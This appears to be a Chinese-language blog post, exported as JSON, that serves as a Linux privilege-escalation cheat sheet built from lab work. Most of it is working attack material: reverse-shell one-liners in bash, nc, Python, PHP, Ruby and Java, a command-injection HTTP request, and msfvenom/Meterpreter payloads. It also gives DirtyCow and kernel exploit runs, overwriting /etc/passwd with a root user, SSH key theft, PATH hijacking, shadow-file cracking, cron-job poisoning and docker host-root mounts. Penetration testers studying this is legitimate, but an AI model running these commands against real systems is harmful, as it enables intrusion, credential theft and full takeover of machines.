{"id":791,"date":"2025-10-24T15:33:32","date_gmt":"2025-10-24T07:33:32","guid":{"rendered":"https:\/\/www.youvii.site\/?p=791"},"modified":"2025-10-24T15:33:32","modified_gmt":"2025-10-24T07:33:32","slug":"linuxtiquan","status":"publish","type":"post","link":"https:\/\/www.youvii.site\/index.php\/archives\/linuxtiquan","title":{"rendered":"Linux\u63d0\u6743"},"content":{"rendered":"

Linux\u63d0\u6743<\/h1>\n

\u5e38\u7528\u547d\u4ee4<\/h1>\n
uname -a #\u67e5\u770b\u5185\u6838\/\u64cd\u4f5c\u7cfb\u7edf\/cpu\u4fe1\u606f\nhend -n 1 \/etc\/issue #\u67e5\u770b\u64cd\u4f5c\u7cfb\u7edf\u7248\u672c\ncat \/proc\/version #\u67e5\u770b\u7cfb\u7edf\u4fe1\u606f\nhostname #\u67e5\u770b\u8ba1\u7b97\u673a\u540d\nenv #\u67e5\u770b\u73af\u5883\u53d8\u91cf\nifconfig #\u67e5\u770b\u7f51\u5361\nnetstat -lntp # \u67e5\u770b\u6240\u6709\u76d1\u542c\u7aef\u53e3\nnetstat -antp # \u67e5\u770b\u6240\u6709\u5df2\u7ecf\u5efa\u7acb\u7684\u8fde\u63a5\nnetstat -s # \u67e5\u770b\u7f51\u7edc\u7edf\u8ba1\u4fe1\u606f\niptables -L #\u67e5\u770b\u9632\u706b\u5899\u8bbe\u7f6e\nroute -n # \u67e5\u770b\u8def\u7531\u8868\nps -ef # \u67e5\u770b\u6240\u6709\u8fdb\u7a0b\ntop # \u5b9e\u65f6\u663e\u793a\u8fdb\u7a0b\u72b6\u6001\nw # \u67e5\u770b\u6d3b\u52a8\u7528\u6237\nid # \u67e5\u770b\u6307\u5b9a\u7528\u6237\u4fe1\u606f\nlast # \u67e5\u770b\u7528\u6237\u767b\u5f55\u65e5\u5fd7\ncut -d: -f1 \/etc\/passwd # \u67e5\u770b\u7cfb\u7edf\u6240\u6709\u7528\u6237\ncut -d: -f1 \/etc\/group # \u67e5\u770b\u7cfb\u7edf\u6240\u6709\u7ec4\ncrontab -l # \u67e5\u770b\u5f53\u524d\u7528\u6237\u7684\u8ba1\u5212\u4efb\u52a1\nchkconfig \u2013list # \u5217\u51fa\u6240\u6709\u7cfb\u7edf\u670d\u52a1\nchkconfig \u2013list | grep on # \u5217\u51fa\u6240\u6709\u542f\u52a8\u7684\u7cfb\u7edf\u670d\u52a1\necho $PATH #\u67e5\u770b\u7cfb\u7edf\u8def\u5f84<\/code><\/pre>\n
\u53cd\u5f39 shell \u547d\u4ee4<\/h1>\n
\u4f7f\u7528nc\u5bf9\u672c\u5730\u7aef\u53e3\u76d1\u542c<\/p>\n
nc -lvnp 8888<\/p>\n
bash\u53cd\u5f39<\/h2>\n
bash -i >& \/dev\/tcp\/ip_address\/port 0>&1<\/p>\n
bash -c "bash -i >& \/dev\/tcp\/192.168.0.189\/6666 0>&1"<\/p>\n
nc\u53cd\u5f39<\/h2>\n
nc -e \/bin\/sh 192.168.2.130 4444<\/p>\n
\u4f46\u67d0\u4e9b\u7248\u672c\u7684nc\u6ca1\u6709-e\u53c2\u6570(\u975e\u4f20\u7edf\u7248),\u5219\u53ef\u4f7f\u7528\u4ee5\u4e0b\u65b9\u5f0f\u89e3\u51b3<\/p>\n
rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc 10.0.0.1 1234 >\/tmp\/f<\/p>\n
python<\/h2>\n
import socket,subprocess,os\ns =socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(( \"192.168.2.130\" , 4444 ))\nos.dup2(s.fileno(), 0 )\nos.dup2(s.fileno(), 1 )\nos.dup2(s.fileno(), 2 )\np = subprocess.call([ \"\/bin\/bash\" , \"-i\" ])<\/code><\/pre>\n
php\u53cd\u5f39shell<\/h2>\n
php -r '$sock=fsockopen(\"192.168.2.130\",4444);exec(\"\/bin\/sh -i <&3 >&3 2>&3\");'<\/code><\/pre>\n
ruby \u53cd\u5f39 shell<\/h2>\n
ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"\/bin\/sh -i\n<&%d >&%d 2>&%d\",f,f,f)'<\/code><\/pre>\n
java \u53cd\u5f39 shell<\/h2>\n
r = Runtime.getRuntime()\np = r.exec([\"\/bin\/bash\",\"-c\",\"exec 5<>\/dev\/tcp\/10.0.0.1\/2002;cat <&5 | while read\nline; do $line 2>&5 >&5; done\"] as String[])\np.waitFor()<\/code><\/pre>\n
xterm \u53cd\u5f39 shell<\/h2>\n
xterm -display 10.0.0.1:1\nPOST \/cmd.php HTTP\/1.1\nHost: 192.168.0.124\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko\/20100101\nFirefox\/92.0\nAccept:\ntext\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 101\ncmd=system('rm+\/tmp\/f%3bmkfifo+\/tmp\/f%3bcat+\/tmp\/f|\/bin\/sh+-\ni+2>%261|nc+192.168.0.189+8888+>\/tmp\/f');<\/code><\/pre>\n
python\u8c03\u7528\u672c\u5730shell\u5b9e\u73b0\u4ea4\u4e92\u5f0f\u547d\u4ee4\u884c<\/h1>\n
\u7ec8\u7aef\u6709\u4e9b\u65f6\u5019\u7cfb\u7edf\u7684\u547d\u4ee4\u7ec8\u7aef\u4e0d\u5141\u8bb8\u76f4\u63a5\u8bbf\u95ee\uff0c\u53ef\u4ee5\u4f7f\u7528python\u865a\u62df\u5316\u4e00\u4e2a\u7ec8\u7aef\u6765\u6267\u884c<\/p>\n
python -c 'import pty;pty.spawn(\"\/bin\/bash\")'\npython3 -c 'import pty;pty.spawn(\"\/bin\/bash\")'<\/code><\/pre>\n
\u4f7f\u7528su\u547d\u4ee4 \u63d0\u793a\u9519\u8bef<\/p>\n
\"1746607382935-d9ed80f5-d0c4-4d38-96c3-80d76a5f9019.png\"<\/p>\n
Linux\u53cd\u5f39shell\u89e3\u51b3\u4e71\u7801<\/h1>\n
ctrl+z \u653e\u7f6e\u540e\u53f0\u4efb\u52a1 \u8bbe\u7f6e\u539f\u59cb\u683c\u5f0f<\/p>\n
stty -echo raw<\/p>\n
fg\u518d\u8c03\u7528\u540e\u53f0\u4efb\u52a1<\/p>\n
\"1746607430337-89b1dc2e-6020-4c5c-9aec-d34d9dab5c3b.png\"<\/p>\n
LINUX \u5185\u6838\u6f0f\u6d1e\u63d0\u6743<\/h1>\n
\u901a\u5e38\u6211\u4eec\u5728\u62e5\u6709\u4e00\u4e2awebshell\u7684\u65f6\u5019\uff0c\u4e00\u822c\u6743\u9650\u90fd\u662fWEB\u5bb9\u5668\u6743\u9650\uff0c\u5982\u5728iis\u5c31\u662fiis\u7528\u6237\u7ec4\u6743\u9650\uff0c\u5728apache \u5c31\u662fapache\u6743\u9650\uff0c\u4e00\u822c\u90fd\u662f\u6743\u9650\u8f83\u4f4e\uff0c\u5747\u53ef\u6267\u884c\u4e00\u4e9b\u666e\u901a\u547d\u4ee4\uff0c\u5982\u67e5\u770b\u5f53\u524d\u7528\u6237\uff0c\u7f51\u7edc\u4fe1\u606f\uff0cip\u4fe1\u606f\u7b49\u3002\u5982\u679c\u6211\u60f3\u8fdb\u884c\u5185\u7f51\u6e17\u900f\u5c31\u5fc5\u987b\u5c06\u6743\u9650\u63d0\u6743\u5230\u6700\u9ad8\uff0c\u5982\u7cfb\u7edf\u6743\u9650 \u8d85\u7ea7\u7ba1\u7406\u5458\u6743\u9650<\/p>\n
\u5185\u6838\u6ea2\u51fa\u63d0\u6743<\/h2>\n
\u5229\u7528\u5806\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u6839\u636e\u5f53\u524d\u7cfb\u7edf \u5bfb\u627e\u5bf9\u5e94\u7684\u6f0f\u6d1e\u7684exp \u4f7f\u7528exp\u5bf9\u5176\u8fdb\u884c\u63d0\u6743<\/p>\n
uname -a\ncat \/proc\/version\ncat \/etc\/issue\ncat \/etc\/redhat-release\nlsb_release -a<\/code><\/pre>\n
\u6839\u636elinux\u7684\u5185\u6838\u7248\u672c\u53bb\u627e\u5bf9\u5e94\u7684exp<\/p>\n
\"1746607486265-660c4f61-6db3-419b-a68f-715bd6d831d5.png\"<\/p>\n
searchsploit -t Ubuntu 14.04\nsearchsploit -s Ubuntu 14.04\nsearchsploit -s Linux Kernel 3.13.0<\/code><\/pre>\n
\u67e5\u770b\u63cf\u8ff0<\/p>\n
searchsploit -x linux\/local\/37088.c<\/p>\n
\u76d1\u542c\u7aef\u53e3 nc -lvnp 7777<\/p>\n
\u53cd\u5f39\u7aef\u53e3<\/p>\n
bash -i >& \/dev\/tcp\/192.168.0.109\/7777 0>&1\ncmd=system('rm+\/tmp\/f%3bmkfifo+\/tmp\/f%3bcat+\/tmp\/f|\/bin\/sh+-\ni+2>%261|nc+192.168.0.109+7777+>\/tmp\/f')%3b\nwget http:\/\/192.168.0.109\/exp.c\ngcc exp.c -o exp\nchmod +x exp\n.\/exp<\/code><\/pre>\n
\"1746607516785-029cb31d-db06-42c1-b3e4-94725aa30780.png\"<\/p>\n
\u810f\u725b\u63d0\u6743 CVE-2016-5195<\/h2>\n
\u8be5\u6f0f\u6d1e\u662f Linux \u5185\u6838\u7684\u5185\u5b58\u5b50\u7cfb\u7edf\u5728\u5904\u7406\u5199\u65f6\u62f7\u8d1d\uff08Copy-on-Write\uff09\u65f6\u5b58\u5728\u6761\u4ef6\u7ade\u4e89\u6f0f\u6d1e\uff0c \u5bfc\u81f4\u53ef\u4ee5\u7834\u574f\u79c1\u6709\u53ea\u8bfb\u5185\u5b58\u6620\u5c04\u3002\u9ed1\u5ba2\u53ef\u4ee5\u5728\u83b7\u53d6\u4f4e\u6743\u9650\u7684\u7684\u672c\u5730\u7528\u6237\u540e\uff0c\u5229\u7528\u6b64\u6f0f\u6d1e\u83b7\u53d6 \u5176\u4ed6\u53ea\u8bfb\u5185\u5b58\u6620\u5c04\u7684\u5199\u6743\u9650\uff0c\u8fdb\u4e00\u6b65\u83b7\u53d6 root \u6743\u9650<\/p>\n
\u6d4b\u8bd5\u73af\u5883 ubuntu 14.04<\/p>\n
exp\u4e0b\u8f7d https:\/\/github.com\/Brucetg\/DirtyCow-EXP<\/a><\/p>\n
\u5728\u9776\u573a\u4e0a\u65b0\u5efa\u666e\u901a\u7528\u6237 moon123 \u5bc6\u7801 456789<\/p>\n
gcc -pthread dirtyc0w.c -o dirtyc0w\nchmod +x dirtycow\n.\/dirtycow \/etc\/group \"$(sed '\/(sudo*)\/ s\/$\/,moon123\/' \/etc\/group)\"<\/code><\/pre>\n
\"1746607567736-e1843cb2-2da2-48a0-b660-f4a75836e6d6.png\"<\/p>\n
\u5df2\u7ecf\u52a0\u5165\u5230sodu\u7ec4 \u53ef\u4ee5\u5207\u6362root\u7528\u6237<\/p>\n
metasploit linux \u63d0\u6743<\/h1>\n
\u7b80\u4ecb<\/h2>\n
Metasploit\u662f\u4e00\u6b3e\u5f00\u6e90\u7684\u5b89\u5168\u6f0f\u6d1e\u68c0\u6d4b\u5de5\u5177\uff0c\u53ef\u4ee5\u5e2e\u52a9\u5b89\u5168\u548cIT\u4e13\u4e1a\u4eba\u58eb\u8bc6\u522b\u5b89\u5168\u6027\u95ee\u9898\uff0c\u9a8c\u8bc1\u6f0f\u6d1e\u7684\u7f13\u89e3\u63aa\u65bd\uff0c\u5e76\u7ba1\u7406\u4e13\u5bb6\u9a71\u52a8\u7684\u5b89\u5168\u6027\u8fdb\u884c\u8bc4\u4f30\uff0c\u63d0\u4f9b\u771f\u6b63\u7684\u5b89\u5168\u98ce\u9669\u60c5\u62a5\u3002\u8fd9\u4e9b\u529f\u80fd\u5305\u62ec\u667a\u80fd\u5f00\u53d1\uff0c\u4ee3\u7801\u5ba1\u8ba1\uff0cWeb\u5e94\u7528\u7a0b\u5e8f\u626b\u63cf\uff0c\u793e\u4f1a\u5de5\u7a0b\u3002\u56e2\u961f\u5408\u4f5c\uff0c\u5728Metasploit\u548c\u7efc\u5408\u62a5\u544a\u63d0\u51fa\u4e86\u4ed6\u4eec\u7684\u53d1\u73b0<\/p>\n
\u4f7f\u7528metasploit linux\u63d0\u6743<\/h2>\n
\u751f\u6210\u653b\u51fb\u8f7d\u8377<\/p>\n
msfvenom -p php\/meterpreter_reverse_tcp LHOST=192.168.0.134 LPORT=12345 -f raw >\n\/var\/www\/html\/shell.php\nfile_put_contents('m.php',file_get_contents('http:\/\/192.168.0.189\/msf.php'));<\/code><\/pre>\n
\u672c\u5730\u76d1\u542c<\/p>\n
use exploit\/multi\/handler\nset payload php\/meterpreter_reverse_tcp\nset lhost 192.168.0.134\nset lport 12345\nexploit<\/code><\/pre>\n
shel.php \u7684\u5185\u5bb9<\/p>\n
\u53cd\u5f39shell<\/p>\n
http:\/\/www.moontester.com\/\/upload\/shellx.php<\/a><\/p>\n
\u5728metasploit\u8bbe\u7f6e\u597d\u76d1\u542c\u6a21\u5757 \u8bbf\u95eeshellx.php \u5c31\u4f1a\u83b7\u53d6\u4e00\u4e2asession<\/p>\n
\u63d0\u6743\u547d\u4ee4<\/h2>\n
getuid \u67e5\u770b\u5f53\u524d\u7528\u6237<\/p>\n
\u4f7f\u7528\u6a21\u5757\u67e5\u8be2\u6f0f\u6d1e<\/p>\n
run post\/multi\/recon\/local_exploit_suggester<\/code><\/pre>\n
shell \u4f7f\u7528\u7ec8\u7aef<\/p>\n
https:\/\/www.exploit-db.com\/exploits\/37292<\/a><\/p>\n
gcc 37292.c -o exp\nchmod +x exp\n.\/exp<\/code><\/pre>\n
\u5982\u679c\u6210\u529f\u5c31\u4f1a\u5f97\u5230\u4e00\u4e2aroot<\/p>\n
suid\u63d0\u6743<\/h1>\n
SUID\u662f\u8d4b\u4e88\u6587\u4ef6\u7684\u4e00\u79cd\u6743\u9650\uff0c\u5b83\u4f1a\u51fa\u73b0\u5728\u6587\u4ef6\u62e5\u6709\u8005\u6743\u9650\u7684\u6267\u884c\u4f4d\u4e0a\uff0c\u5177\u6709\u8fd9\u79cd\u6743\u9650\u7684\u6587\u4ef6\u4f1a\u5728\u5176\u6267\u884c\u65f6\uff0c\u4f7f\u8c03\u7528\u8005\u6682\u65f6\u83b7\u5f97\u8be5\u6587\u4ef6\u62e5\u6709\u8005\u7684\u6743\u9650\u3002\u4e5f\u5c31\u662f\u5982\u679cROOT\u7528\u6237\u7ed9\u67d0\u4e2a\u53ef\u6267\u884c\u6587\u4ef6\u52a0\u4e86S\u6743\u9650\uff0c\u90a3\u4e48\u8be5\u6267\u884c\u7a0b\u5e8f\u8fd0\u884c\u7684\u65f6\u5019\u5c06\u62e5\u6709ROOT\u6743\u9650<\/p>\n
\u4ee5\u4e0b\u547d\u4ee4\u53ef\u4ee5\u53d1\u73b0\u7cfb\u7edf\u4e0a\u8fd0\u884c\u7684\u6240\u6709SUID\u53ef\u6267\u884c\u6587\u4ef6<\/p>\n
find \/ -perm -u=s -type f 2>\/dev\/null\nfind \/ -user root -perm -4000-print2>\/dev\/null\nfind \/ -user root -perm -4000-exec ls -ldb {} ;<\/code><\/pre>\n
\"1746607684046-d973b79a-2b31-4a5d-a336-98cd3e5f3ebd.png\"<\/p>\n
\/\u8868\u793a\u4ece\u6587\u4ef6\u7cfb\u7edf\u7684\u9876\u90e8\uff08\u6839\uff09\u5f00\u59cb\u5e76\u627e\u5230\u6bcf\u4e2a\u76ee\u5f55<\/p>\n
-perm \u8868\u793a\u641c\u7d22\u968f\u540e\u7684\u6743\u9650<\/p>\n
-u = s\u8868\u793a\u67e5\u627eroot\u7528\u6237\u62e5\u6709\u7684\u6587\u4ef6<\/p>\n
-type\u8868\u793a\u6211\u4eec\u6b63\u5728\u5bfb\u627e\u7684\u6587\u4ef6\u7c7b\u578b<\/p>\n
f \u8868\u793a\u5e38\u89c4\u6587\u4ef6\uff0c\u800c\u4e0d\u662f\u76ee\u5f55\u6216\u7279\u6b8a\u6587\u4ef6<\/p>\n
2\u8868\u793a\u8be5\u8fdb\u7a0b\u7684\u7b2c\u4e8c\u4e2a\u6587\u4ef6\u63cf\u8ff0\u7b26\uff0c\u5373stderr\uff08\u6807\u51c6\u9519\u8bef\uff09<\/p>\n
\u641c\u7d22\u6587\u4ef6\u8fdb\u884c\u63d0\u53d6<\/p>\n
https:\/\/gtfobins.github.io\/<\/a><\/p>\n
find . -exec \/bin\/sh -p ; -quit\ncat \/etc\/shadow<\/code><\/pre>\n
\"1746607715309-c2a48dda-b443-402f-a405-d82396bc0413.png\"<\/p>\n
\u5e38\u89c1suid\u63d0\u6743\u6587\u4ef6<\/p>\n
nmap\u3001vim\u3001find\u3001more\u3001less\u3001bash\u3001cp\u3001Nano\u3001mv\u3001awk\u3001man\u3001weget<\/p>\n
passwd\u63d0\u6743<\/h1>\n
\u901a\u8fc7OpenSSL passwd\u751f\u6210\u4e00\u4e2a\u65b0\u7684\u7528\u6237hacker\uff0c\u5bc6\u7801\u4e3ahack123<\/p>\n
openssl passwd -1 -salt moonhack 123456<\/code><\/pre>\n
$1$moonhack$4o50Z4aoUGaLMC0Rg4Io40<\/p>\n
\u5c06\u5176\u8ffd\u52a0\u5230kali\u7684\/etc\/passwd\u6587\u4ef6\u4e2d<\/p>\n
\u5c06hacker:$1$hacker$0vnQaCNuzDe3w9d6jHfXQ0:0:0:\/root:\/bin\/bash\u8ffd\u52a0\u5230passwd\u4e2d<\/p>\n
\u5728Kali\u4e0a\u542f\u52a8\u4e00\u4e2apython\u670d\u52a1\u5668<\/p>\n
python -m SimpleHTTPServer 8000<\/p>\n
\u5c06Kali\u4e0a\u7684passwd\u6587\u4ef6\u4e0b\u8f7d\u5230\u9776\u673aetc\u76ee\u5f55\u4e0b\u5e76\u8986\u76d6\u539f\u6765\u7684passwd\u6587\u4ef6<\/p>\n
wget http:\/\/192.168.0.134\/passwd -O \/etc\/passwd<\/code><\/pre>\n
\u7136\u540e\u5207\u6362\u5230moonhack\u7528\u6237\u5373\u53ef<\/p>\n
\"1746607793314-6034817b-6a57-4115-a094-31ae65398e1e.png\"<\/p>\n
\u4f7f\u7528ssh\u8fdc\u7a0b\u767b\u5f55<\/p>\n
ssh moonhack@192.168.0.135<\/p>\n
\"1746607805626-47f92273-69f9-4ad1-b2d9-c04721b9fa79.png\"<\/p>\n
\u4f7f\u7528su\u547d\u4ee4 \u5207\u6362\u7528\u6237<\/p>\n
\"1746607814734-6355ed0f-5f15-451e-9c98-be933f6e27c3.png\"<\/p>\n
ssh\u5bc6\u94a5\u63d0\u6743<\/h1>\n
cat \/etc\/passwd | grep bash<\/code><\/pre>\n
\u8df3\u8f6c\u5230.ssh\u76ee\u5f55 \u5956id_rsa\u4e0b\u8f7d\u5230\u672c\u5730\u8bbe\u7f6e\u6743\u9650 600 \u767b\u5f55<\/p>\n
cd \/home\/web1\/.ssh<\/code><\/pre>\n
\"1746607846462-529231ce-e7c1-4f78-9651-7f1cef16e51a.png\"<\/p>\n
chmod 600 id_rsa<\/code><\/pre>\n
\u8bbe\u7f6e\u6743\u9650\u4e3a600<\/p>\n
ssh -i id_rsa web1@192.168.0.135<\/code><\/pre>\n
\"1746607865164-f71f8d3d-3e8f-4cb4-a85f-7030f2cb0ecb.png\"<\/p>\n
\u73af\u5883\u52ab\u6301\u63d0\u6743<\/h1>\n
\u73af\u5883\u52ab\u6301\u9700\u8981\u7684\u4e24\u4e2a\u6761\u4ef6 \u5b58\u5728\u5e26\u6709suid\u7684\u6587\u4ef6 suid\u6587\u4ef6\u5b58\u5728\u7cfb\u7edf\u547d\u4ee4<\/p>\n
\u5bfb\u627esuid\u6587\u4ef6<\/p>\n
find \/ -perm -u=s -type f 2>\/dev\/null<\/code><\/pre>\n
\"1746607890095-b6d61b2a-1e4a-4e6c-85ee-2aaa99a02963.png\"<\/p>\n
\u5206\u6790\u6587\u4ef6 \u53d1\u73b0\u662f\u4e00\u4e2a\u67e5\u8be2\u8fdb\u884c\u7684\u547d\u4ee4 \u6240\u4ee5\u91cc\u9762\u5e94\u8be5\u662f\u7528ps\u547d\u4ee4<\/p>\n
\"1746607901480-447ce774-8d20-4ed7-8ecd-85cdf5e05b9a.png\"\"1746607905890-91202912-cacd-4b79-b5db-4da4b2e9bf37.png\"<\/p>\n
\u8fd9\u4e2a\u4e8c\u8fdb\u5236\u6587\u4ef6\u8fd0\u884c\u8bb8\u7684\u65f6\u5019\u4e00\u5b9a\u662f\u8c03\u7528\u4e86ps\u547d\u4ee4\uff0c\u5728\/tmp\u547d\u4ee4\u4e0b \u521b\u5efaps\u6587\u4ef6 \u91cc\u9762\u4f7f\u7528 \/bin\/bash\u6267\u884c\u547d\u4ee4<\/p>\n
\u5f53tmp\u7684\u8def\u5f84\u6dfb\u52a0\u5230\u5f53\u524d\u73af\u5883\u8def\u5f84\uff0c\u518d\u8bbf\u95ee \/script\u76ee\u5f55 \u6267\u884cshell\u6587\u4ef6\uff0c\u5141\u8bb8\u7684\u65f6\u5019\u9996\u5148\u4f1a\u91c7\u7528\/tmp\u76ee\u5f55\u7684ps\u6587\u4ef6\u4f5c\u4e3a\u547d\u4ee4<\/p>\n
\u6240\u4ee5\u53ef\u4ee5\u52ab\u6301root\u547d\u4ee4\u6267\u884c<\/p>\n
cd \/tmp\necho \"\/bin\/bash\" > ps\nchmod 777 ps\necho $PATH\nexport PATH=\/tmp:$PATH\ncd \/script\n.\/shell<\/code><\/pre>\n
\"1746607936107-4839f05e-b817-40e4-9e7c-2376686b0179.png\"<\/p>\n
john\u7834\u89e3shadow root\u5bc6\u6587\u767b\u5f55\u63d0\u6743<\/h1>\n
john\u4f1a\u81ea\u52a8\u68c0\u6d4b\u5bc6\u6587\u7c7b\u578b –wordlist \u5b57\u6bb5\u6587\u4ef6<\/p>\n
john --wordlist=\"\/usr\/share\/wordlists\/rockyou.txt\" userpassw\n\nroot:$6$URZ1c7qW$z5jZA6\/j9fb8d4ExJOWuwCjEFo0tfBkfV.D3OIf0c0ukepcZYgrBhO6vjpNbmYc\nt1uco9NrtBw3z50tCoMbqb1:18907:0:99999:7:::<\/code><\/pre>\n
\"1746608005350-4f022aef-ca18-4e96-99ff-581509a938f3.png\"<\/p>\n
Ubuntu\u8ba1\u5212\u4efb\u52a1\u53cd\u5f39shell\u63d0\u6743<\/h1>\n
\u5f53\u83b7\u53d6\u4e00\u4e2alinux\u666e\u901a\u7528\u6237\u7684\u65f6\uff0c\u67e5\u770b\u8ba1\u5212\u4efb\u52a1<\/p>\n
cat \/etc\/crontab<\/p>\n
\"1746608023992-14c86a8a-dcd3-4edb-a32a-44f7e09f36cc.png\"<\/p>\n
crontab -l \u67e5\u770b\u5f53\u524d\u7528\u6237\u547d\u4ee4<\/p>\n
\"1746608033884-3baff338-fa53-43f8-b8ff-3075dd72fa18.png\"<\/p>\n
\/var\/spool\/cron\/crontabs\/root \u8fd9\u4e2a\u76ee\u5f55\u662froot\u4efb\u52a1\u6587\u4ef6 \u9ed8\u8ba4\u662f\u4e0d\u662froot\u6743\u9650\u662f \u770b\u4e0d\u5230<\/p>\n
\"1746608043314-6beabc40-9919-4de0-86c9-6bb328b2322a.png\"<\/p>\n
tail -f \/var\/log\/syslog<\/p>\n
\"1746608050457-94befbd4-ab13-4d3d-8646-2fbdc8d2fa41.png\"<\/p>\n
\u67e5\u770b\u65e5\u5fd7\u6587\u4ef6 \u53d1\u73b0root\u6bcf\u4e00\u5206\u949f\u4f1a\u6267\u884c\u4e00\u6b21 cleanup.py\u6587\u4ef6<\/p>\n
\u4fee\u6539\u5185\u5bb9 \u53cd\u5f39shell<\/p>\n
bash -i >& \/dev\/tcp\/192.168.0.109\/6666 0>&1<\/p>\n
\"1746608070285-af5c2999-ec98-4a8f-aed0-aff0cc90890b.png\"<\/p>\n
\u672c\u5730\u76d1\u542c nc -lvnp 6666<\/p>\n
\"1746608079299-36a68f4b-cdb6-40c3-8533-bd3c291d582c.png\"<\/p>\n
\u63d0\u6743\u811a\u672c\u5e94\u7528<\/h1>\n
LinEnum<\/h2>\n
https:\/\/github.com\/rebootuser\/LinEnum<\/a><\/p>\n
\u4e0b\u8f7d\u6267\u884c<\/p>\n
wget -O - http:\/\/192.168.0.109\/LinEnum.sh | bash<\/code><\/pre>\n
\"1746608114697-f969e321-7376-47f6-a6aa-af8edb51e52b.png\"<\/p>\n
linuxprivchecker<\/h2>\n
https:\/\/github.com\/sleventyeleven\/linuxprivchecker<\/a><\/p>\n
python3\u7248\u672c<\/p>\n
https:\/\/github.com\/swarley7\/linuxprivchecker<\/a><\/p>\n
https:\/\/github.com\/swarley7\/linuxprivchecker<\/code><\/pre>\n
\"1746608156927-e4b2641c-1b41-4b38-a052-8312ab1b2812.png\"<\/p>\n
linux-exploit-suggester2<\/h2>\n
https:\/\/github.com\/jondonas\/linux-exploit-suggester-2<\/a><\/p>\n
\u81ea\u52a8\u68c0\u6d4b<\/p>\n
perl linux-exploit-suggester-2.pl<\/code><\/pre>\n
\u6307\u5b9a\u7248\u672c<\/p>\n
\"1746608187176-59c9a743-1261-4996-bb9a-fff59c5f2206.png\"<\/p>\n
docker \u63d0\u6743<\/h1>\n
docker\u662f\u4e00\u4e2a\u5bb9\u5668 \u53ef\u4ee5\u5728\u540c\u4e00\u53f0\u673a\u5b50\u865a\u62df\u591a\u53f0\u670d\u52a1\u3002<\/p>\n
\u8f93\u5165\u547d\u4ee4id \u548cgroup \u67e5\u8be2\u5f53\u524d\u7528\u6237\u4fe1\u606f\u548c\u7ec4\u4fe1\u606f \u53d1\u73b0\u5b58\u5728docker\u7ec4<\/p>\n
\"1746608200700-807e2a7d-b57f-4f70-aca6-d8b60e9e92e8.png\"<\/p>\n
\u8f93\u5165\u547d\u4ee4\u4e0b\u8f7d\u4f7f\u7528\u5bb9\u5668\u628a\u5bb9\u5668\u7684\u76ee\u5f55\u6302\u8f7d\u5230\u5bbf\u4e3b\u7684\u6839\u76ee\u5f55<\/p>\n
docker run -v \/:\/mnt -it alpine<\/code><\/pre>\n
\u8bbf\u95ee\u5bbf\u4e3b\u7684\/etc\/shadow<\/p>\n
cat \/mnt\/etc\/shadow<\/p>\n
\"1746608225925-97761588-f743-493e-ad59-495cef92c08c.png\"<\/p>\n
sudo\u63d0\u6743<\/h1>\n
sudo \u662f\u4e00\u79cd\u6743\u9650\u7ba1\u7406\u673a\u5236\uff0c\u7ba1\u7406\u5458\u53ef\u4ee5\u6388\u6743\u4e8e\u4e00\u4e9b\u666e\u901a\u7528\u6237\u53bb\u6267\u884c\u4e00\u4e9b root \u6267\u884c\u7684\u64cd\u4f5c\uff0c\u800c\u4e0d\u9700\u8981\u77e5\u9053 root \u7684\u5bc6\u7801\u3002<\/p>\n
\u9996\u5148\u901a\u8fc7\u4fe1\u606f\u6536\u96c6\uff0c\u67e5\u770b\u662f\u5426\u5b58\u5728sudo\u914d\u7f6e\u4e0d\u5f53\u7684\u53ef\u80fd\u3002\u5982\u679c\u5b58\u5728\uff0c\u5bfb\u627e\u4f4e\u6743\u9650sudo\u7528\u6237\u7684\u5bc6\u7801\uff0c\u8fdb\u800c\u63d0\u6743\u3002<\/p>\n
sudo -l<\/p>\n
\u5217\u51fa\u76ee\u524d\u7528\u6237\u53ef\u6267\u884c\u4e0e\u65e0\u6cd5\u6267\u884c\u7684\u6307\u4ee4<\/p>\n
\u53ef\u4ee5\u770b\u5230\u53ef\u4ee5\u4f7f\u7528root\u7279\u6743\u4e0b\u7684cat\u547d\u4ee4\uff0c\u6240\u4ee5\u53ef\u4ee5\u8bfb\u53d6\u4efb\u4f55\u6587\u4ef6<\/p>\n
\"1746608268499-6d837dbb-fcc0-4f69-b6b9-f50bc13847ce.png\"<\/p>\n
\u539f\u7406<\/p>\n
\u901a\u5e38\u8fd0\u7ef4\u4f1a\u5c06\u4e00\u4e9b\u9700\u8981 sudo\u7684\u547d\u4ee4 \u96c6\u6210\u5230\u67d0\u4e2a\u7528\u6237\u6216\u8005\u67d0\u4e2a\u7ec4<\/p>\n
\u7136\u540e\u5728\/etc\/sudoers\u6587\u4ef6\u5185\u8fdb\u884c\u8bbe\u7f6e<\/p>\n
\u9996\u5148\u8bbe\u7f6e chmod +w cat \/etc\/sudoers \u4f7f\u7528vi\u5bf9\u5176\u7f16\u8f91 \u4fdd\u5b58\u5373\u53ef<\/p>\n
# User privilege specification\nroot ALL=(ALL:ALL) ALL\nmoonsec ALL=(root) NOPASSWD:\/bin\/cat\n# Members of the admin group may gain root privileges\n%admin ALL=(ALL) ALL\n# Allow members of group sudo to execute any command\n%sudo ALL=(ALL:ALL) ALL\n# See sudoers(5) for more information on \"#include\" directives:<\/code><\/pre>\n
NOPASSWD \u4e0d\u9700\u8981\u5bc6\u7801 \u4f7f\u7528cat\u547d\u4ee4 \u5e76\u4e14\u5177\u6709\u7279\u6743\u6743\u9650<\/p>\n
linux mysql udf\u63d0\u6743<\/h1>\n
\u5982\u679c\u5728linux\u4e2d \u5b58\u5728mysql \uff0c\u53ef\u4ee5\u8bd5\u7528mysql\u63d0\u6743 \u4f46\u662f\u51e0\u7387\u4e0d\u4f1a\u592a\u5927<\/p>\n
show variables like '%plugin%';<\/code><\/pre>\n
\"1746608311063-c399fa64-6d6f-4386-aa82-0e0540f4f2a8.png\"<\/p>\n
